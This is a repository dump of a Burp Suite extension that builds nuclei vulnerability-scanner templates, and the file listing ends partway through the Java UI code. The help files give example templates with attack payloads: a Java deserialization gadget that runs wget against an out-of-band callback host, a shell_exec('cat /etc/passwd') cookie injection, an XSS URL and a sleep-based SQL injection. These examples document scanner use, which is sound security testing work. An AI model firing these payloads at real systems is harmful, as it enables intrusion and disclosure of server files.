├── .github └── workflows │ └── ci.yml ├── .gitignore ├── 1.png ├── LICENSE ├── README.md ├── format_help_docs.py ├── help1.txt ├── help2.txt ├── pom.xml └── src └── main └── java └── burp ├── BurpExtender.java └── utils └── Config.java /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | name: Java CI 2 | 3 | on: 4 | create: 5 | tags: 6 | - v* 7 | 8 | jobs: 9 | build: 10 | runs-on: ubuntu-latest 11 | 12 | steps: 13 | - uses: actions/checkout@v2 14 | 15 | - name: Set up JDK 17 16 | uses: actions/setup-java@v2 17 | with: 18 | java-version: '17' 19 | distribution: 'adopt' 20 | 21 | - name: Build with Maven 22 | run: mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V 23 | 24 | - name: Upload JAR file 25 | uses: actions/upload-artifact@v2.3.1 26 | with: 27 | name: burp_nu_te_gen_Releases.zip 28 | path: target/Nu_Te_Gen-*-SNAPSHOT-jar-with-dependencies.jar 29 | 30 | - name: Zip the Build 31 | run: cd target && zip -r ../burp_nu_te_gen_Releases.zip Nu_Te_Gen-*-SNAPSHOT-jar-with-dependencies.jar 32 | 33 | - name: Create Release 34 | id: create_release 35 | uses: actions/create-release@v1 36 | env: 37 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 38 | with: 39 | tag_name: ${{ github.ref }} 40 | release_name: Release ${{ github.ref }} 41 | body: TODO New Release. 
42 | draft: false 43 | prerelease: false 44 | 45 | - name: Upload Release Asset 46 | uses: actions/upload-release-asset@v1 47 | env: 48 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 49 | with: 50 | upload_url: ${{ steps.create_release.outputs.upload_url }} 51 | asset_path: ./burp_nu_te_gen_Releases.zip 52 | asset_name: burp_nu_te_gen_Releases.zip 53 | asset_content_type: application/zip 54 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | **/.DS_Store 2 | .idea 3 | /target 4 | push.sh 5 | format_*.txt -------------------------------------------------------------------------------- /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffffffff0x/burp_nu_te_gen/71376538d5e4fb5c8e82a7b22ec9431792b82b5a/1.png -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. 
For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 
47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # burp_nu_te_gen 2 | 3 | nuclei模版生成插件 4 | 5 | 仅用于生成所需模版 6 | 7 | 效果 8 | 9 | ![](./1.png) 10 | -------------------------------------------------------------------------------- /format_help_docs.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | def format_file(filename): 4 | formatted_lines = [] 5 | with open(filename, 'r', encoding='utf-8') as file: 6 | lines = file.readlines() 7 | for line in lines: 8 | line = line.rstrip('\r\n') 9 | line = '"' + line.replace('"', '\\"') + '\\n" +' 10 | formatted_lines.append(line) 11 | 12 | # 删除文本尾部的空行 13 | while formatted_lines and not formatted_lines[-1].strip(): 14 | formatted_lines.pop() 15 | 16 | # 替换最后一行的结尾 17 | if formatted_lines: 18 | formatted_lines[-1] = formatted_lines[-1].replace('\\n" +', '\\n";') 19 | 20 | # 添加前缀并写入新文件 21 | new_filename = f"format_(unknown)" 22 | with open(new_filename, 'w', encoding='utf-8', newline='\n') as new_file: 23 | for 
line in formatted_lines: 24 | new_file.write(line + '\n') 25 | 26 | # 处理 help1.txt 和 help2.txt 27 | files_to_format = ['help1.txt', 'help2.txt'] 28 | for file in files_to_format: 29 | if os.path.exists(file): 30 | format_file(file) 31 | print(f"文件 {file} 格式化完成!") 32 | else: 33 | print(f"文件 {file} 不存在。") 34 | 35 | -------------------------------------------------------------------------------- /help1.txt: -------------------------------------------------------------------------------- 1 | 官方文档:https://docs.projectdiscovery.io/templates/introduction 2 | 3 | nuclei 2.9.1 版本更新了模板格式。如果使用的是较旧的 nuclei 版本,可能无法解析新的模板格式。 4 | 建议将 nuclei 版本升级至 2.9.1 或更高版本以确保正确解析模板格式。 5 | 6 | ===========================示例模板=========================== 7 | id: template-id 8 | 9 | info: 10 | name: Template Name 11 | author: test 12 | severity: info 13 | description: 漏洞详情描述 14 | reference: 15 | - https://Template.nuclei.sh 16 | # 元数据节点,与 uncover 集成的格式如下:-query: '' 17 | metadata: 18 | max-request: 2 19 | fofa-query: 'body="公司"' 20 | shodan-query: 'vuln:CVE-2021-26855' 21 | hunter-query: 'web.body="公司"' 22 | tags: tags 23 | 24 | # 自定义模版变量,自2.6.9版本开始支持 25 | variables: 26 | first_1: "{{rand_int(8, 20)}}" 27 | first_2: "{{rand_int(100, 101)}}" 28 | 29 | http: 30 | # 解析 raw 格式请求 31 | - raw: 32 | - |- 33 | POST /{{Path}} HTTP/1.1 34 | Host: {{Hostname}} 35 | Content-Type: application/json 36 | 37 | {"username":{{username}},"password":{{password}}} 38 | 39 | attack: clusterbomb # 定义HTTP模糊攻击类型,可用类型: batteringram,pitchfork,clusterbomb 40 | payloads: 41 | username: 42 | - 'admin' 43 | password: 44 | - 'admin' 45 | # header: helpers/wordlists/header.txt 46 | Path: 47 | - 'api/selectContentManagePage' 48 | 49 | matchers-condition: and 50 | matchers: 51 | - type: dsl 52 | dsl: 53 | - "contains(body, 'pageSize')" 54 | - "contains(body_1, 'pageSize') && contains(body_2, 'pageNum')" 55 | - "contains_all(body_1, 'pageSize', 'pageNum')" #单个body包内指定多个匹配关键字 56 | - "contains(header, 'application/json')" 57 | - 
"status_code == 200" 58 | - "status_code_1 == 404 && status_code_2 == 200" 59 | 60 | # 检查Cookie的MD5校验和是否包含在大写的请求体中 61 | - "contains(toupper(body), md5(cookie))" 62 | condition: and 63 | 64 | - type: dsl 65 | dsl: 66 | # 检测相应包的长度 67 | - "len(body_1) != 0" 68 | # 基于DSL的持续时间匹配器,当响应时间与定义的持续时间匹配时返回true,示例为大于等于6秒 69 | - 'duration>=6' 70 | condition: and 71 | 72 | # 匹配变量 73 | - type: word 74 | part: body 75 | words: 76 | - "{{first_2}}" 77 | 78 | # Interactsh匹配器,需要和使用 {{interactsh_response}} 79 | # 可匹配 interactsh_protocol、interactsh_request和 interactsh_response 三处 80 | 81 | # 确认HTTP交互 82 | - type: word 83 | part: interactsh_protocol 84 | words: 85 | - "http" 86 | 87 | # 确认检索/etc/passwd文件 88 | - type: regex 89 | part: interactsh_request 90 | regex: 91 | - "root:[x*]:0:0:" 92 | 93 | # 确认DNS交互 94 | - type: word 95 | part: interactsh_response 96 | words: 97 | - "dns" 98 | 99 | # 二进制流匹配 100 | - type: binary 101 | binary: 102 | - "504B0304" # zip archive 103 | - "526172211A070100" # RAR archive version 5.0 104 | - "FD377A585A0000" # xz tar.xz archive 105 | condition: or # 指定单个匹配器内多个条件的与或关系 106 | part: body 107 | 108 | - type: word 109 | encoding: hex 110 | words: 111 | - "50494e47" 112 | part: body 113 | 114 | # 否定匹配器,对匹配器结果进行取反 115 | - type: word 116 | words: 117 | - "PHPSESSID" 118 | part: header 119 | negative: true 120 | 121 | extractors: 122 | - type: regex 123 | # 为提取的信息命名,方便调用,可省略 124 | name: api 125 | part: body 126 | # 避免在终端中打印提取的值,使用动态变量时必须添加此标志 127 | internal: true 128 | regex: 129 | - "(?m)[0-9]{3,10}\\.[0-9]+" 130 | 131 | ----------------------------分割线---------------------------- 132 | # 嵌套表达式 133 | ❌ {{url_decode({{base64_decode('SGVsbG8=')}})}} 134 | ✔ {{url_decode(base64_decode('SGVsbG8='))}} 135 | 136 | # 如果需要在 extractor 中使用,比如将 extractor 提取的变量值 test 进行处理 137 | {{url_decode(base64_decode('{{test}}'))}} 138 | 139 | ----------------------------分割线---------------------------- 140 | # 自 Nuclei v2.3.6 发行以来,Nuclei 支持使用 interact.sh API 内置自动请求关联来实现基于 OOB 的漏洞扫描 141 | 
http: 142 | - raw: 143 | - | 144 | GET /plugins/servlet/oauth/users/icon-uri?consumerUri={{interactsh-url}} HTTP/1.1 145 | Host: {{Hostname}} 146 | 147 | ----------------------------分割线---------------------------- 148 | # JAVA反序列化: https://docs.nuclei.sh/template-guide/helper-functions#deserialization-helper-functions 149 | http: 150 | - raw: 151 | - | 152 | POST /index.faces;jsessionid=x HTTP/1.1 153 | Host: {{Hostname}} 154 | Content-Type: application/x-www-form-urlencoded 155 | 156 | javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}} 157 | 158 | ----------------------------分割线---------------------------- 159 | # 发送一个GET请求 160 | http: 161 | - method: GET 162 | path: 163 | - "{{BaseURL}}/actuator/env" 164 | - "{{BaseURL}}/login" 165 | - "{{BaseURL}}/thumbs.db" 166 | - "{{BaseURL}}/.svn/wc.db" 167 | # 发送一些头部信息给服务器的示例 168 | headers: 169 | X-Client-IP: 127.0.0.1 170 | X-Remote-IP: 127.0.0.1 171 | X-Remote-Addr: 127.0.0.1 172 | X-Forwarded-For: 127.0.0.1 173 | X-Originating-IP: 127.0.0.1 174 | Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" 175 | 176 | # skip-variables-check 可以使 nuclei 不要解析请求内容中 `{{` 为变量 177 | skip-variables-check: true 178 | 179 | # 如果模板中包含多个扫描路径,当第一个路径匹配成功时,会自动停止后续路径的扫描,这不会影响其他模板 180 | stop-at-first-match: true 181 | 182 | # 单位 bytes- 从服务器响应中读取的最大值 183 | max-size: 500 184 | 185 | ----------------------------分割线---------------------------- 186 | id: wp-related-post-xss 187 | 188 | http: 189 | # 发送一个POST请求 190 | - method: POST 191 | path: 192 | - '{{RootURL}}/wp-login.php' 193 | headers: 194 | Content-Type: application/x-www-form-urlencoded 195 | body: 'log={{username}}&pwd={{password}}&wp-submit=Log+In' 196 | 197 | - method: GET 198 | path: 199 | - '{{RootURL}}/wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3Ep' 200 | 201 | # cookie-reuse 参数为 true,在多个请求之间维护基于 
cookie 的会话,该参数接受布尔类型的输入,默认值为 false。 202 | cookie-reuse: true 203 | 204 | # 请求条件与匹配器中的DSL表达式一起使用。它们允许逻辑表达式包含跨多个请求/响应的条件。 205 | # 在模板中添加 "req-condition: true" 选项。响应的属性可以使用 "<请求编号>" 后缀来引用特定的响应,例如 status_code_1、status_code_3 或 body_2。 206 | req-condition: true 207 | 208 | matchers-condition: and 209 | matchers: 210 | - type: dsl 211 | dsl: 212 | - "contains(header, 'text/html')" 213 | - "contains(body_1, '&action=edit') && contains(body_2, 'All Posts')" 214 | - "status_code == 200" 215 | condition: and 216 | 217 | ----------------------------分割线---------------------------- 218 | # @timeout 请求注解 219 | id: PrestaShop_Product_Comments_SQL_Injection_CVE-2020-26248 220 | 221 | http: 222 | - raw: 223 | - | 224 | # @timeout 是请求注解的一种,用于覆盖默认的请求超时时间 225 | @timeout: 20s 226 | GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1 227 | Host: {{Hostname}} 228 | 229 | matchers: 230 | - type: dsl 231 | dsl: 232 | - 'duration>=6 && status_code == 200' 233 | - 'contains(content_type, "application/json") && contains(body, "average_grade")' 234 | condition: and 235 | 236 | ----------------------------分割线---------------------------- 237 | # "self-contained"通常在批量检测API可用性时使用 238 | # 假设你通过信息泄露获得了一个API密钥,但不知道这个密钥属于哪个服务,也没有其他特征可供参考。这时,你只能逐个尝试各个官方API接口,看哪个平台能够成功验证该密钥。 239 | id: example-self-contained-input 240 | 241 | self-contained: true 242 | http: 243 | - raw: 244 | - | 245 | GET https://example.com:443/gg HTTP/1.1 246 | Host: example.com:443 -------------------------------------------------------------------------------- /help2.txt: -------------------------------------------------------------------------------- 1 | 官方文档:https://docs.projectdiscovery.io/templates/reference/helper-functions 2 | 3 | ----------------------------分割线---------------------------- 4 | # https://example.com:443/foo/bar.php 5 | 6 | {{BaseURL}} # https://example.com:443/foo/bar.php 7 | {{RootURL}} # https://example.com:443 8 | {{Hostname}} # 
example.com:443 9 | {{Host}} # example.com 10 | {{Port}} # 443 11 | {{Path}} # /foo 12 | {{File}} # bar.php 13 | {{Scheme}} # https 14 | 15 | ----------------------------分割线---------------------------- 16 | # 重点配置参数备忘: 17 | 18 | # skip-variables-check 可以使 nuclei 不要解析请求内容中 `{{` 为变量 19 | skip-variables-check: true 20 | 21 | # 如果模板中包含多个扫描路径,当第一个路径匹配成功时,会自动停止后续路径的扫描,这不会影响其他模板 22 | stop-at-first-match: true 23 | 24 | # 单位 bytes- 从服务器响应中读取的最大值 25 | max-size: 500 26 | 27 | # cookie-reuse 参数为 true,在多个请求之间维护基于 cookie 的会话,该参数接受布尔类型的输入,默认值为 false。 28 | cookie-reuse: true 29 | 30 | # req-condition 与 DSL表达式匹配器一起使用,它允许逻辑表达式包含跨多个请求/响应的条件 31 | # 在模板中添加 "req-condition: true" 选项,响应的属性可以使用 "<请求编号>" 后缀来引用特定的响应,例如 status_code_1、status_code_3 或 body_2 32 | req-condition: true 33 | 34 | redirects: true # 启用重定向 35 | max-redirects: 3 # 允许重定向的次数,默认值为 10 36 | 37 | ----------------------------分割线---------------------------- 38 | # 模板签名: 39 | 40 | # 从v3.0.0开始支持签名,未签名的模板默认会被禁用 41 | # 批量对模板进行签名 42 | nuclei -lfa -duc -sign -t /home/nuclei-templates 43 | 44 | ----------------------------分割线---------------------------- 45 | # 返回输入的长度 46 | 47 | {{len("Hello")}} 48 | {{len(5555)}} 49 | 50 | ----------------------------分割线---------------------------- 51 | # 随机字段 52 | 53 | {{randstr}} 54 | {{rand_int(10)}} 55 | 56 | ----------------------------分割线---------------------------- 57 | # 大小写转换 58 | 59 | {{to_lower("HELLO")}} #将输入转换为小写字符 60 | {{to_upper("hello")}} #将输入转换为大写字符 61 | 62 | ----------------------------分割线---------------------------- 63 | # 编码转换 64 | 65 | {{url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")}} #对输入字符串进行URL解码 66 | {{url_encode("https://projectdiscovery.io/test?a=1")}} #对输入字符串进行URL编码 67 | 68 | {{hex_decode("6161")}} 69 | {{hex_encode("aa")}} 70 | 71 | {{sha1("Hello")}} 72 | {{sha256("Hello")}} 73 | 74 | {{base64("Hello")}} 75 | {{base64(1234)}} 76 | {{base64_decode("SGVsbG8=")}} 77 | {{base64_py("Hello")}} #像Python一样将字符串编码为Base64(包含换行符) 78 | 79 | {{md5("Hello")}} 80 | 
{{md5(1234)}} 81 | 82 | ----------------------------分割线---------------------------- 83 | {{rand_base(5)}} 84 | {{rand_base(5, "abc")}} 85 | {{rand_char("abc")}} 86 | {{rand_char()}} 87 | {{rand_int()}} 88 | {{rand_int(1, 10)}} 89 | {{rand_text_alpha(10)}} 90 | {{rand_text_alpha(10, "abc")}} 91 | {{rand_text_alphanumeric(10)}} 92 | {{rand_text_alphanumeric(10, "ab12")}} 93 | {{rand_text_numeric(10)}} 94 | {{rand_text_numeric(10, 123)}} 95 | 96 | ----------------------------分割线---------------------------- 97 | # 验证字符串是否包含子字符串 98 | {{contains("Hello", "lo")}} 99 | 100 | ----------------------------分割线---------------------------- 101 | 102 | {{generate_java_gadget("commons-collections3.1", "wget {{interactsh-url}}", "base64")}} 103 | {{gzip("Hello")}} 104 | {{html_escape("test")}} 105 | {{html_unescape("<body>test</body>")}} 106 | {{mmh3("Hello")}} 107 | {{print_debug(1+2, "Hello")}} 108 | {{regex("H([a-z]+)o", "Hello")}} 109 | {{remove_bad_chars("abcd", "bc")}} 110 | {{repeat("../", 5)}} 111 | {{replace("Hello", "He", "Ha")}} 112 | {{replace_regex("He123llo", "(\\d+)", "")}} 113 | {{reverse("abc")}} 114 | {{trim("aaaHelloddd", "ad")}} 115 | {{trim_left("aaaHelloddd", "ad")}} 116 | {{trim_prefix("aaHelloaa", "aa")}} 117 | {{trim_right("aaaHelloddd", "ad")}} 118 | {{trim_space(" Hello ")}} 119 | {{trim_suffix("aaHelloaa", "aa")}} 120 | {{unix_time(10)}} 121 | {{wait_for(1)}} 122 | 123 | ----------------------------分割线---------------------------- 124 | # www.projectdiscovery.io 125 | 126 | {{FQDN}} # www.projectdiscovery.io 127 | {{RDN}} # projectdiscovery.io 128 | {{DN}} # projectdiscovery 129 | {{SD}} # www 130 | {{TLD}} # io -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | net.test 8 | Nu_Te_Gen 9 | 1.4.1-SNAPSHOT 10 | 11 | 12 | 13 | 14 | org.apache.maven.plugins 15 | maven-compiler-plugin 16 | 17 | 15 18 | 15 19 | 20 | 
21 | 22 | 23 | 24 | org.apache.maven.plugins 25 | maven-assembly-plugin 26 | 2.4.1 27 | 28 | 29 | 30 | jar-with-dependencies 31 | 32 | 33 | 34 | 35 | burp.BurpExtender 36 | 37 | 38 | 39 | 40 | 41 | 42 | make-assembly 43 | 44 | package 45 | 46 | single 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | net.portswigger.burp.extender 58 | burp-extender-api 59 | LATEST 60 | 61 | 62 | org.apache.commons 63 | commons-text 64 | 1.10.0 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /src/main/java/burp/BurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import burp.utils.Config; 4 | 5 | import java.awt.Component; 6 | import java.awt.event.ActionEvent; 7 | import java.awt.event.ActionListener; 8 | import java.io.PrintWriter; 9 | import javax.swing.*; 10 | import java.awt.*; 11 | import java.util.*; 12 | 13 | public class BurpExtender implements IBurpExtender, ITab, IHttpListener { 14 | private IBurpExtenderCallbacks callbacks; 15 | private IExtensionHelpers helpers; 16 | private JTabbedPane tabs; 17 | public PrintWriter stdout; 18 | 19 | boolean match_true; 20 | boolean match_word; 21 | boolean match_header; 22 | boolean match_status; 23 | boolean match_negative; 24 | boolean match_time; 25 | boolean match_size; 26 | boolean match_interactsh_protocol; 27 | boolean match_interactsh_request; 28 | boolean match_regex; 29 | boolean match_binary; 30 | boolean extractors; 31 | 32 | @Override 33 | public void registerExtenderCallbacks(final IBurpExtenderCallbacks callbacks) { 34 | //输出 35 | this.stdout = new PrintWriter(callbacks.getStdout(), true); 36 | this.stdout.println("hello Nu_Te_Gen!"); 37 | this.stdout.println("version:1.4"); 38 | 39 | // keep a reference to our callbacks object 40 | this.callbacks = callbacks; 41 | 42 | // obtain an extension helpers object 43 | helpers = callbacks.getHelpers(); 44 | 45 | // set our extension name 46 | 
callbacks.setExtensionName("Nu_Te_Gen V1.4"); 47 | 48 | // create our UI 49 | SwingUtilities.invokeLater(new Runnable() { 50 | @Override 51 | public void run() { 52 | 53 | // nuclei 模版生成界面 54 | // JSplitPane Nu_Te_Pane = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT); 55 | JPanel Nuc_jp1 = new JPanel(); 56 | Nuc_jp1.setLayout(new GridLayout(13, 1)); 57 | 58 | JButton Nuc_bt_1 = new JButton("生成"); 59 | JButton Nuc_bt_2 = new JButton("清空"); 60 | 61 | JLabel Nuc_lb_id = new JLabel("模版id:", SwingConstants.RIGHT); 62 | JTextField Nuc_tf_id = new JTextField(1); 63 | Nuc_tf_id.setText("test"); 64 | 65 | JLabel Nuc_lb_name = new JLabel("模版名称:", SwingConstants.RIGHT); 66 | JTextField Nuc_tf_name = new JTextField(1); 67 | Nuc_tf_name.setText("test"); 68 | 69 | JLabel Nuc_lb_author = new JLabel("作者名称:", SwingConstants.RIGHT); 70 | JTextField Nuc_tf_author = new JTextField(1); 71 | Nuc_tf_author.setText("ffffffff0x"); 72 | 73 | JLabel Nuc_lb_severity = new JLabel("严重程度:", SwingConstants.RIGHT); 74 | JComboBox Nuc_Tab_severity = new JComboBox(GetSeverityModes()); 75 | Nuc_Tab_severity.setMaximumSize(Nuc_Tab_severity.getPreferredSize()); 76 | Nuc_Tab_severity.setSelectedIndex(0); 77 | 78 | JLabel Nuc_lb_description = new JLabel("描述:", SwingConstants.RIGHT); 79 | JTextField Nuc_tf_description = new JTextField(1); 80 | Nuc_tf_description.setText("由插件自动生成"); 81 | 82 | JLabel Nuc_lb_tags = new JLabel("Tags:", SwingConstants.RIGHT); 83 | JTextField Nuc_tf_tags = new JTextField(1); 84 | Nuc_tf_tags.setText("auto"); 85 | 86 | JLabel Nuc_lb_req = new JLabel("请求方式:", SwingConstants.RIGHT); 87 | JComboBox Nuc_Tab_req = new JComboBox(GetReqModes()); 88 | Nuc_Tab_req.setMaximumSize(Nuc_Tab_req.getPreferredSize()); 89 | Nuc_Tab_req.setSelectedIndex(0); 90 | 91 | JLabel Nuc_lb_path = new JLabel("请求路径:", SwingConstants.RIGHT); 92 | JTextField Nuc_tf_path = new JTextField(1); 93 | Nuc_tf_path.setText(""); 94 | 95 | JLabel Nuc_lb_headers = new JLabel("Content-Type:", SwingConstants.RIGHT); 96 | 
